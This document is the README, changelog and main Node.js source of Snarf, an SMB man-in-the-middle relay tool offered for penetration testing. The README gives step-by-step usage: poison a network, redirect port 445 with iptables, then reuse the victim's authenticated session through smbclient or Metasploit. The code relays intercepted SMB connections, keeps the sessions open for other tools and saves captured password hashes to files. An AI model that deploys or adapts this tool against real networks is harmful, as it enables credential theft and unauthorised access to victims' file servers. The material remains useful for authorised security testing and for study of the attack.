README.md
snarf
=====

Snarf is a software suite to help increase the value of man-in-the-middle attacks.  Many historical applications of techniques like SMB-Relay rely on assumptions, and relegate these attacks to exploitation, rather than the discovery / enumeration phase of the penetration test.  While Snarf doesn't introduce new vulnerabilities, it does introduce a new capability to capitalize on exploiting familiar vulnerabilities.

Check out [our NOLAcon '14 presentation](http://www.josho.org/software/snarf-nolacon-presentation.pdf) for a decent intro to the concept.

Check out [a 'live' demo of Snarf in action](https://www.youtube.com/watch?v=oBSrcrdRLyA&feature=youtu.be) to get a better sense for how it works.

The Fundamental Idea
====================

At its core, Snarf has one key principle in play: when you MITM something, don't throw it away.  Don't just try to lob a payload through it and hope it works.  Instead, we relay a connection for a client, and keep the connection to the server when the client is done.  We hold onto it, and provide a facility to jack in additional tools to that same, preserved connection.  This way, once we middle a connection, we can explore it.  Use multiple tools, assess what privileges or rights we have, etc. -- all to give the penetration tester more direct control of the situation.

Prerequisites
=============

You will need several key things.  First, Snarf relies on iptables, so it is Linux-specific.  It may be possible to move it to something like PF, but that is currently unknown.  At any rate, here is a list of basic requirements:

  * Linux (Kali works fine)
  * NodeJS -- Snarf is implemented in Node to take advantage of it's snazzy event-driven I/O
  * An existing MITM / redirection strategy -- Snarf will not MITM the victim, it will only capitalize on it
    * ARP poisoning
    * DHCP poisoning
    * LLMNR poisoning
    * ICMP redirect
    * GRE tunnels
    * etc.

In most Linux distributions, the only thing you'll have to do is install Node.  In a Debian-derived distribution, this would look something like this (works in Kali):

    $ sudo apt-get install nodejs

Running Snarf
=============

Here's the basic process:

  1. Do a man-in-the-middle -- Linux must be routing the traffic of your victim
  2. Run Snarf as root, binding to your LAN IP

    $ sudo node snarf.js <bindIP>

  3. Run the iptables rule to move traffic to SNARF's chain:

    $ sudo iptables -t nat -A PREROUTING -p tcp --dport 445 -j SNARF

  3. Open a web browser to http://localhost:4001/
  4. Wait for a connection to come through
  5. Either wait for the connection to "complete" or "expire" it manually with the provided buttons
  6. Connect your own tools (e.g., for SMB use smbclient, net, Metasploit, etc.) to 127.0.0.1.  (Note, the username and password you use don't matter -- Snarf will authenticate it no matter what.  The resulting session will use the snarfed connection to the server and, with it, the victim's credentials)

Known Issues
============

  1. For SMB, Snarf only does username/password auth, not anonymous sessions.  You will want to provide a "-U user%pass" to any Samba-derived tools to make sure this will work.
  2. Snarf makes minimal changes to your traffic.  So, when you do a TREE_CONNECT, it will pass the destination hostname unchanged.  If you make it "localhost", then the server will give you an error about a duplicate name.  This is because servers don't like being called "localhost".  Instead, connect to "127.0.0.1" -- Windows doesn't mind this.  In other words, run "smbclient -U b%b //127.0.0.1/c$", and don't use the name "localhost" in the command.
  3. Windows does weird and unpredictable things.  Sometimes, you may end up with a session that doesn't work.  This could be a bug (so feel free to let us know about it), but it could also just be a vagary of SMB.  Servers don't always keep sessions around as reliably as we want, etc.  So, while Snarf will dramatically improve your ability to get value out of a middled connection, remember that there is still a probabilistic aspect to any MITM attack.
  4. Make sure you follow the on-screen instructions for completing the iptables setup -- we don't apply the last iptables rule in the code because MITM is inherently dangerous.  Think carefully about how that rule should be used.  You probably don't want hundreds of systems coming through, so you can adjust the parameters on the "iptables -t nat -I PREROUTING -p tcp --dport 445 -j SNARF" command to ensure that only the desired systems get snarfed.


CHANGELOG

Version 0.4 (Released: TBD)

NEW
---
Added navigation menu to web interface; introducing a dedicated settings page
Integrated blacklist component into web interface
Integrated single/cycle target modes into web interface
Added client-side ajax polling (major improvement over auto-refresh)
Implemented refresh interval setting on navigation menu
Added ability to save Responder.py-style (-r) hashes
Added Snarf ID# to hash dialog
Complete redesign of web interface; now using Bootstrap instead of jQuery UI
Added advanced help/usage statement to console


BUGS
----
Fixed typo in smbbroker.js(line:227) - s/middler.attributes.timreID/middler.attributes.timerID
Fixed issue affecting deactivateKeepAlive().
    The function would not properly execute when called from server.on('error'). The
    variable passed from broker.deactivateMiddler() was type integer, representing the
    middler ID. However, the deactivateKeepAlive() function expected a middler object.
    The code was modified(middler.js-line:168) to pass the current middler object. This
    seemed to work well since it supported other areas that called the function with a
    middler object. Two additional lines (broker.js-line:120-121) were modified accordingly.


snarf.js
//
// snarf - SMB man-in-the-middle tool
// Copyright (C) 2015 Josh Stone (yakovdk@gmail.com)
//                    Victor Mata (victor@offense-in-depth.com)
//
// This program is free software; you can redistribute it and/or
// modify it under the terms of the GNU General Public License
// as published by the Free Software Foundation; either version 2
// of the License, or (at your option) any later version.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with this program; if not, write to the Free Software
// Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
//
// ------------------------------------------------------------------------
//
// snarf is an SMB man-in-the-middle (MITM) tool for taking control of
// intercepted SMB sessions.  This can be useful, particularly in the
// event that credentials defy cracking, even with rainbow tables.
//
// The attacker must set up his attack so that inbound SMB sessions are
// redirected to the "bind-IP" for snarf, which will then relay the
// connection through its completion.  Once complete, however, snarf
// will maintain the connection and provide access for other tools to
// connect through it at localhost:445.
//
// The session can be reused by any number of other tools, largely
// without impairment of the original session's access to the server
// system.
//
// Sample usage:
//
//   $ node snarf.js 192.168.1.4
//
// This will bind the MitM process at 192.168.1.4, and any connection
// coming in on that IP on port 445 will be relayed to to their
// destinations.  It is intended that you use iptables to redirect
// traffic appropriately.
//

var util       = require('util');
var net        = require('net');
var smb        = require("./smb.js");
var out        = require("./out.js");
var midl       = require("./middler.js");
var ctrl       = require("./control.js");
var rout       = require("./router.js");
var SMBBroker  = require("./smbbroker.js").SMBBroker;
var Getopt     = require("node-getopt");
var RL         = require('readline');
var fs         = require('fs');
var cycle      = require("./cycle.js");
var bl         = require("./blacklist.js");

out.red("SNARF - 0.4 - SMB Man in the Middle Attack Engine");
out.red("by Josh Stone (yakovdk@gmail.com) and Victor Mata (victor@offense-in-depth.com)");

getopt = new Getopt([
    ['s', 'single=IP'     , 'Default IP (think LLMNR or NBNS)'],
    ['c', 'cycle=FILE'    , 'Round-robin default destination from file'],
    ['l',                 , 'Keep limit of 3 connections for each client/server pair: EXPERIMENTAL'],
    ['b', 'blacklist=FILE', 'Define a blacklist to avoid relaying to specified hosts; one IP per line'],
    ['i', 'intercept'     , 'Complete the SNARF chain and begin intercepting immediately'],
    ['r',                 , 'Save responder-style hashes; EXPERIMENTAL'],
    ['h', 'help'          , 'Show advanced help and usage statement']
]);

var basic = "\nUsage: node snarf.js [OPTION] BindIP\n\n" +
            "[[OPTIONS]]\n"

var verbose =  "\nUsage: node snarf.js [OPTION] BindIP\n\n" +
               "  Target:\n" +
               "    Select one of the following attack modes when executing\n" +
               "    name-poisoning attacks (LLMNR/NBNS).\n\n" +
               "    -s, --single=IP        Relay to a single IP address\n" +
               "    -c, --cycle=FILE       Cycle a list of targets in a round-robin rotation; one IP per line\n\n" +
               "  Filter:\n" +
               "    These options can be used to filter incoming connections.\n\n" +
               "    -l                     Keep limit of 3 connections for each client/server pair [EXPERIMENTAL]\n" +
               "    -b, --blacklist=FILE   Define a blacklist to avoid relaying to specified hosts; one IP per line\n\n" +
               "  Router:\n" +
               "    Snarf uses iptables to detect and process incoming connections.\n" +
               "    These options can be used to modify the routing behavior.\n\n" +
               "    -i, --intercept        Complete the SNARF chain and begin intercepting immediately\n" +
               "                           By default, you must add the last rule manually\n" +
               "                           ** Only required for ARP poisoning or true MitM attacks\n\n" +
               "  Miscellaneous:\n" +
               "    -r                     Save responder-style hashes [EXPERIMENTAL]\n" +
               "    -v, --version          Show version\n" +
               "    -h, --help             Show advanced help and usage statement\n"


opt = getopt.parse(process.argv.slice(2));

if (opt.argv.length != 1) {
    if (opt.options['help']) {
        getopt.setHelp(verbose);
    } else {
        getopt.setHelp(basic);
    }
  getopt.showHelp();
  process.exit(1);
}


var bindip  = opt.argv[0];

if (opt.options['intercept']) {
    var router = new rout.Router(bindip, true);
} else {
    var router = new rout.Router(bindip);
}

var globals = new Object;
var broker  = new SMBBroker(globals);
var count   = 0;
var client;

//
// Initialize the blacklist
//

out.red("BLACKLIST option " + opt.options['blacklist']);
if(opt.options['blacklist']) {
    globals.blacklist = bl.loadBlacklist(opt.options['blacklist']);
} else {
    globals.blacklist = new bl.Blacklist();
}

//
// We want to log all hashes we catch in a file.
//

globals.hashfile = fs.createWriteStream("snarf.pot", { flags: "a", encoding: null, mode: 0777 });
globals.hashes = [];

//
// [BETA] Alternative method of saving hashes. This method is identical
//        to the Responder.py tool. Now, theres no excuse to run Responder
//        by itself :)
//

if(opt.options['r']) {
    globals.responderhash = function(srcip, htype, hash) {
        filename = "SMB-"+htype+"-Client-"+srcip+".txt";
        wstream = fs.createWriteStream(filename, { flags: 'a', encoding: null, mode: 0644 });
        wstream.write(hash);
        wstream.end();
    }
}

//
// One of the more useful features is the ability to send a request
// that is sent directly to the listening service to a "single" IP of
// the attacker's choice.  Well, as useful as this is, it's even
// better to be able to specify a variety of targets.  This code sets
// up the global settings for either a single default, a circular list
// of targets, or no default at all.
//

if(opt.options['single']) {
    globals.cycle        = new cycle.Cycle();
    globals.targetsingle = true;
    globals.targetinit   = function() { return opt.options["single"] }
    globals.target       = function() { return globals.targetinit() }
} else if(opt.options['cycle']) {
    globals.cycle         = cycle.loadCycle(opt.options['cycle']);
    globals.targetsingle  = false;
    globals.target        = function() { return globals.cycle.shift() }
    globals.targetpeek    = function() { return globals.cycle.current() }
} else {
    globals.cycle         = new cycle.Cycle();
    globals.targetsingle  = true;
    globals.target        = function() { return null }
    //globals.targetpeek    = function() { return false }
    globals.targetpeek    = undefined;
}

ctrl.ControlPanel(broker, 4001, globals);

client = net.createServer(function(sock) {
    sock.pause();
    out.red("Client " + sock.remoteAddress + ":" + sock.remotePort + " connected");

    router.checkout(sock.remoteAddress, sock.remotePort, function(tip) {
        if(tip == bindip || tip == "0.0.0.0") {
            if(globals.target) { // && globals.target != "0.0.0.0") {
                var target = globals.target();
                if(!globals.blacklist.ok(sock.remoteAddress)) {
                    midl.NullMiddler(sock);
                    out.red("Blacklist prevents relaying " + sock.remoteAddress + " to default destination");
                    return;
                }
                if(target != sock.remoteAddress) {
                    out.red("Got inbound connection, routing to " + target);
                    tip = target;
                } else {
                    // Consider the MS08-068 check
                    out.red("Received connection from " + target + " to " + target);
                    out.red("Not middling (it wouldn't work anyway)");
                    midl.NullMiddler(sock);
                    return;
                }
            } else {
                out.red("ERROR, can't relay connection destined for bindip");
                out.red("You may want to specify a default destination with");
                out.red("the '-d <ip>' flag.");
                midl.NullMiddler(sock);
                return;
            }
        }
        out.red("Destination is " + tip);
        out.red("Broker currently has " + broker.countDups(sock.remoteAddress, tip) + " similar connections");

        var server = net.connect({port: 445, host: tip}, function() {
            if(opt.options['limit'] && broker.countDups(sock.remoteAddress, tip) >= 3) {

                // Sometimes, servers can get fussy if they have too
                // many open sessions.  This is an EXPERIMENTAL
                // feature to relay and then throw away any
                // connections from / to clients / servers for which
                // we already have three middlers.

                out.red("Hit limit of 3 connections for " + sock.remoteAddress + " -> " + tip + ", relaying");
                midl.Relay(sock, server);
                sock.resume();
            } else if(!globals.blacklist.ok(sock.remoteAddress)) {
                out.red("Blacklist prevents snarfing connection for " + sock.remoteAddress + ", relaying");
                midl.Relay(sock, server);
                sock.resume();
            } else {
                out.red("Server connected, will relay to " + tip);
                var middler = new midl.Middler(count);
                count += 1;
                middler.setClientInfo(sock.remoteAddress,sock.remotePort,tip);
                middler.setBroker(broker);
                broker.addMiddler(middler);
                middler.setServer(server);
                middler.setOriginalClient(sock);
                sock.resume();
            }
        });
        server.on("error", function(exception) {
            out.red("Server connection encountered an error" + exception);
            out.red("This could be because of a failure to route to the destination");
        });
    });
});

client.listen(445, bindip, function() {
    out.red("Interception server bound to " + bindip + ":445");
});

process.on('uncaughtException', function (err) {
    out.red("Unknown error occurred... recovering:");
    console.error(err.stack);
});
